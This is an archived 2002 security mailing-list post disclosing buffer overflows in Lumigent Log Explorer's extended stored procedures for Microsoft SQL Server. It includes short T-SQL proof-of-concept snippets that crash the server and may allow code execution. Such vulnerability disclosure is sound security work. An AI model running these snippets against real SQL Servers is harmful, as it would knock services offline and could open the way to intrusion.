Lumigent Log Explorer 3.xx extended stored procedures buffer overflow

From: martin rakhmanoff (jimmersat_private)
Date: Fri Jun 14 2002 - 06:05:15 PDT

Next message: Seunghyun Seo: "Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+"

Previous message: martin rakhmanoff: "Microsoft SQL Server 2000 pwdencrypt() buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Lumigent Log Explorer is a transaction log explorer for Microsoft SQL Server 7/2000. It ships with extended stored procedures implemented in xp_logattach.dll. Some of them suffer from buffer overflows that lead to SQL Server service crash and potentially to arbitrary code execution. Below is sample code that crashes SQL Server: declare @bo varchar(8000) set @bo = replicate('A', 800) exec xp_logattach_StartProf @bo declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach_setport @bo declare @bo varchar(8000) set @bo = replicate('A',800) exec xp_logattach @bo Procedures can be run only by dbo (master) by default. Vendor was informed but I got no response confirming this problem and no fixes. Cheers Martin Rakhmanoff (jimmers) jimmersat_private

Next message: Seunghyun Seo: "Re: +ALERT+ BACKDOOR IN MSN666 SNIFFER FOR SNIFFING MSN +ALERT+"
Previous message: martin rakhmanoff: "Microsoft SQL Server 2000 pwdencrypt() buffer overflow"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Jun 14 2002 - 08:11:42 PDT